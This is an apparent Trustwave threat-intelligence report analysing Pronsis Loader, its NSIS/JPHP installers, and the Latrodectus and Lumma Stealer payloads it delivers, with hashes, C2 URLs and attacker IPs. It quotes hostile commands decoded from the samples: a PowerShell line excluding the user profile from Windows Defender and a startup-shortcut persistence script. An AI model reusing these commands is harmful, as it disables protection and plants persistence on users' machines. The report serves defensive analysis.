October 08, 2024 7 Minute Read

Trustwave's Threat Intelligence team has discovered a new malware dubbed Pronsis Loader, with its earliest known variant dating back to November 2023.

This loader shares similarities with the D3F@ck Loader , which surfaced in January 2024. Pronsis Loader has been observed delivering different malware variants, including Lumma Stealer and Latrodectus as its primary payloads. Additionally, the team identified infrastructure linked to Lumma Stealer during the investigation.

Pronsis Loader

Pronsis Loader is a newly identified malware that bears similarities to the D3F@ck Loader. Both utilize JPHP-compiled executables, making them easily interchangeable. However, one area they diverge in is their installer approaches: while D3F@ck Loader uses Inno Setup Installer, Pronsis Loader leverages Nullsoft Scriptable Install System (NSIS) . NSIS, an open-source tool, enables the creation of customized Windows installers, which Pronsis Loader uses for its deployment.

Figure 1. The use of NSIS by Pronsis Loader

What makes this type of loader particularly interesting is its use of JPHP, a less common programming language among threat actors. JPHP, a Java implementation of PHP, was notably used by IceRat in 2020 then by D3F@ck in 2024. Unlike typical Java files that use the .class extension, JPHP files are compiled into .phb format. While these .phb files cannot be directly decompiled with conventional Java tools, they still contain 0xCAFEBABE headers, which signify a Java class. This allows for decompilation after extraction.

A key difference with Pronsis Loader is its overall lack of certificate usage, including SSL certificates, in its installer files. While many malware families rely on certificates to enhance trust or encrypt communications, often bypassing security measures, Pronsis Loader generally avoids this approach. This omission could make it easier to detect in environments that check for certificate-based security.

Figure 2. CAFEBABE headers within the .phb files

The Pronsis Loader discovered was named FullWorker-Install_sib.xyz (SHA256: fee966680f41a4e28497ebf9d6e10486b427efff21f88163462a6c19b7d2bdc0). Using 7-Zip, we extracted the contents of the NSIS installer. Interestingly, while the latest versions of 7-Zip cannot extract NSIS scripts, version 15.05 and earlier versions allow for successful extraction of these scripts.

Figure 3. NSIS Script File extracted in earlier versions of 7-zip

Upon analysis, most of the NSI script focuses on dropping files into the %Temp% directory. Despite the installer’s considerable size (~90MB), most of the installer’s contents consist of benign files designed to disguise malicious files. As seen in Figure 5, all these are known files aside from the FailWorker-Install.exe (SHA256: 7e3ccfeb074c4666a4a34ae23c0606432f77c641e1cf62fc034a6575dd23abd1), which contains the malicious code.

Figure 4. Dropping of files in the %TEMP% directory

Figure 5. FailWorker-Install.exe disguising itself within legitimate files

At the latter end of the script, an NSIS plug-in was used for executing the Pronsis Loader. This calls Nact.dll with the exportinstall, which will run the JPHP-compiled executable loader FailWorker-Install.exe.

Figure 6. NSIS plug-in to run Pronsis Loader

In Pronsis Loader, the executable is implemented in Java and can be easily extracted using 7-Zip, making it relatively straightforward to analyze. In contrast, some versions of D3F@ck Loader uses a password-protected file, with the password embedded in its InnoSetup installer script.

In certain instances of Pronsis Loader, a visible user interface is presented during the "installation" process. However, in most recent versions, a silent installation method is employed, where no user interface is displayed.

Figure 7. Installation that leads to Pronsis Loader

Once extracted, the initial module to be loaded can be identified within the JPHP-INF directory. In Figure 8, the launcher.conf file specifies a .bootstrap file, which indicates that the app\modules directory will be loaded.

Figure 8. Identifying which module is the entry point

The AppModule directory contains two .phb files that still cannot be directly decompiled. However, extracting the files with the 0xCAFEBABE headers allows it to be successfully decompiled. In this case, we have also included other .phb files in the app directory and not only in the app\modules\ directory.

Figure 9. Directory of the main module

Figure 10. CAFEBABE headers within the main modules

Upon extracting the .class file from MainModule.phb, it becomes clear that the loader is designed to download a payload from a specified URL. This URL is later observed delivering the Latrodectus malware.

Figure 11. Code snippet where the payload is downloaded from

The source path of the threat actor for Pronsis Loader for this file is:

E:\\Lab\\ORDERS\\090424-3\\src\\app\\modules\\MainModule.php

Our observations reveal consistent patterns in both the source path and ZIP file naming conventions used by Pronsis Loader. The loader consistently utilizes the source path E:\Lab\ORDERS\<Date>, and the ZIP files generally follow a naming pattern of three concatenated words ([word1][word2][word3].zip). Notably, in most ZIP files, the third word is PRO. This information was extracted from the Pronsis Loader files, as detailed below:

The payload is contained in a file named todaydatabase.zip (SHA256: 32f3bf999bda8cb72484c2fa659be105cf6cfd56487e2d825843a96b7a32ada0), which is downloaded and saved in the path %Temp%/todaydatabase.zip . After the download, the todaydatabase.zip file is extracted and executed, initiating the infection process for Latrodectus malware.

In addition to the payload delivery, a module for defense evasion is embedded within the MainForm.phb file. The string within this module is encoded in base64, and when decoded, it reveals a PowerShell script. This script is used to exclude the user's profile directory (C:\Users\<username>) from being scanned by Windows Defender, enabling the malware to evade detection.

Figure 12. Base64-encoded string used to evade Windows Defender scanning

The decoded command is as follows:

@ECHO OFF
powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE

This PowerShell command will be placed in a batch file (.bat) with a randomized numeric filename and saved in the %Temp% directory. This batch file is then executed via cmd.exe.

Figure 13. Creation and execution of the batch file

Latrodectus Payload

Latrodectus, discovered in October 2023, shares similarities with IcedID in terms of behavior and structure. It has primarily been distributed via phishing emails and has garnered attention in recent months due to its increasing activities.

Within the downloaded archive file, the payload todaydatabase.exe (SHA256: b45bc251e0c731d157638bf162aad13b4428387ada433b37dba3796cbd9b4093) is executed, which subsequently drops another executable, todaydatabaseovlresig.exe (SHA256: d8ff7b3040d2674dbdc77b184266ddef54444c0d8db4880ddd3bcd45d610e0c1). This secondary executable then drops and executes the various components of the Latrodectus malware, leading to its full infection on the system.

Figure 14. Process tree of the initial Latrodectus malware

The file todaydatabaseovlresig.exe was converted using Bat2Exe and, upon execution, drops a 7zip archive. This archive contains two files:

1. autorun.bat (SHA256: 60e863e70dce64bbd564b98113a75f58c455ae604235ed1339a595944a19321a)
2. todaydatabaseovlresig.exe (SHA256: 989f811ac3c4ba5413fef99154ba60d930835d17832d6c26e3b66d9d45e01126) – similar file name but different hash

The batch file (autorun.bat) is executed from a temporary directory, facilitating further actions related to the deployment of Latrodectus.

Figure 15. Contents of the 7-zip file

The contents of autorun.bat are detailed in Figure 16. The script begins with the command @echo off, which disables the display of commands being executed. It then uses xcopy to copy todaydatabaseovlresig.exe from its current location to the %TEMP% directory.

Figure 16. Contents of autorun.bat

After setting up some variables, the script runs a PowerShell command to create a Windows Shortcut File for the copied file in the %TEMP% directory. This ensures that the file automatically executes when the user logs in. The PowerShell script used is as follows:

powershell -Command
"$WScriptShell = New-Object -ComObject WScript.Shell;
$Shortcut = $WScriptShell.CreateShortcut('%startupFolder%\%shortcutName%');
$Shortcut.TargetPath = '%filePath%';
$Shortcut.Save()"

Since the malware has not yet been executed from the %Appdata% directory, it will drop a copy of itself into the %Appdata%\Custom_update directory with a filename that includes randomized hexadecimal characters. In this case, the final path and name is:

C:\Users\<user>\AppData\Roaming\Custom_update\Update_824f1995.exe

This file in the AppData directory will be the final executable used to carry out the malware’s functions.

Figure 17. Process tree leading to the final payload

To achieve persistence, the malware creates a scheduled task named Updater that runs every 10 minutes, executing the file located in the Custom_update directory.

Figure 18. Scheduled task of Latrodectus

Additionally, the malware establishes a mutex named runnung , consistent with previous versions of the malware.

Figure 19. Created mutex for Latrodectus

The observed command-and-control (C2) servers for this Latrodectus variant are:

• hxxps://restoreviner[.]com/test/
• hxxps://peronikilinfer[.]com/test/

Lumma Stealer Payload

The team has also observed that Pronsis Loader deploys Lumma Stealer, which operates under a Malware-as-a-Service (MaaS) model and has been active in the wild since 2022. Unlike Latrodectus , which is another payload associated with Pronsis Loader, Lumma Stealer has been the predominant payload in most instances of Pronsis Loader files.

The initial file of the Lumma stealer observed is detailed_agreement_and_payment_information_august_2024_documentation.exe (SHA256: a94c04f560d7381a445aaef3cc977fbf179e021568674e09170a7a4bcf381d10), which is a Nullsoft installer. Upon installation, it drops a JPHP-compiled file named EducationGraduate_Setup.exe (SHA256: 77ccd2215c29f6c4ee2c997d93edbd598a3346df352d75abe0a51a8f002f0ea2) in the %Temp%/EducationGraduate_Setup path.

Figure 20. Dropped files of the installer file

It will be downloading the payload from the following URL:

• hxxp://91[.]208[.]206[.]5/nego/individualcoordinatepro.zip

This ZIP file contains the executable individualcoordinate.exe (SHA256: 5448b5b736ed090c7216e01bf24088607b0ee5f34c2508f0e1a9112e473b87f7), which is a .NET application. The executable includes functionality for decoding an encrypted DLL file, which is retrieved from:

• hxxp://91[.]208[.]206[.]5/nego/Zazkanqh[.]wav

Figure 21. Decryption routine for the DLL file

The encrypted DLL file Zazkanqh.wav (SHA256: f244b2c81fbb82c7086a1b9eb0d22c3435cc7d0d6e34759fcc6b6089746ec1fd) can be decoded either using the routine embedded in individualcoordinate.exe or manually with XOR decryption tools.

Figure 22. Manual decryption using Cyberchef

The observed C2 server for this Lumma Stealer variant is:

• hxxps://locatedblsoqp[.]shop/api

Lumma Stealer Repository

Based on the IP address from which Pronsis Loader downloaded the Lumma Stealer file, the team was able to identify additional infrastructure that the loader may be utilizing both currently and in the future.

The IP address 91[.]208[.]206[.]5 is hosted by Alexhost SRL. From this information, the team was able to identify additional IP addresses with open directories accessed by the loader for downloading Lumma Stealer.

Identified IP addresses:

• 176[.]123[.]1[.]34
• 193[.]233[.]203[.]109
• 193[.]233[.]203[.]31
• 91[.]208[.]197[.]152
• 213[.]232[.]235[.]202
• 91[.]208[.]206[.]5
• 37[.]221[.]65[.]251
• 37[.]221[.]67[.]211
• 193[.]233[.]202[.]183
• 85[.]239[.]34[.]61
• 91[.]229[.]239[.]57
• 159[.]253[.]120[.]202
• 94[.]103[.]188[.]64
• 85[.]239[.]33[.]22
• 93[.]185[.]167[.]95
• 176[.]123[.]2[.]192
• 185[.]113[.]8[.]141
• 45[.]86[.]86[.]15

From these IP addresses, we identified additional open directories that are used to store malicious files, particularly Lumma Stealer files. Here are some of the identified open directories:

Aside from these IP addresses and open directories, the team has discovered similarities among the latest Pronsis Loader files. The internal name used for these files, particularly in the latest campaign, is newfileov01prosign. Moreover, another name identified in the files is IedZ95gZDV, which was used before this latest campaign. From this, additional loader files were also identified

• 8bdec308590bca50e04d23abb9e44c2665f6d5cdb00f2ad8b8535a24aeab9df2
• 20be60f5995a1041bfc9fb1aadf27c469a31b34277979c25f18bcbea8f4ed74b
• f18fa5aad5877f994ffb403f3a34367b7d296803e4a892f8035df5129b72273a
• b3929ac3936237590d3b3210a120703b9dfda91cc30d0ab7088738fc76626728
• 897e9663f37e54915a60b54e160478a60520f43a497ec9fb5913d21ae456ae37
• ffe15cb0e5919a5b37825f2c24cb57f063b9c24d04b86888dfc129f7905e45ee
• c2439b3778afe4aa4aea45a7e4d62811201f3a51a6820bcad6f195f58ef5324b
• 98f880e1ca7f4f5a869e7c1641206fe8ffe91fb171fb3256ff91bea5d322a1d3
• 84a8d78d1c276560a0e7596206029809c11046b4d14e8df1d13044b78362b567
• f76e0d89d63d173ccdbefd484d9d5c21420c8a5630084b29bfa0f0fdbee6ec04
• 0c7fa9cdb7bd20cf3acf1677f35bbc1217203ae2031cf20ee71ba85680f06a87
• 192e05f11f9ad5575766732105668a7a81aff690af079f610c73a8cfd928a88e
• 908551fca6bc1e5370afa6012e580e5e9f2b9251028a6e213835eed4b044fc4d
• 528d7edc3231250dfa8db1ddf8286ea7ba978059f82700f81f996e628932051d

All these are JPHP-compiled files. Most of the payload of these files are Lumma Stealer. This leads to new IP addresses with open directories based on their connections:

• 85[.]239[.]33[.]148
• 193[.]233[.]203[.]37

The discovery of Pronsis Loader highlights its similarities with D3F@ck Loader and its role in delivering Lumma Stealer and Latrodectus as primary payloads. The identification of related infrastructure enhances understanding of this threat. Looking ahead, this underscores the importance of maintaining vigilance and adaptability in threat intelligence practices. Leveraging these insights will be crucial for anticipating and countering future malware developments, ensuring that defenses remain effective against evolving threats.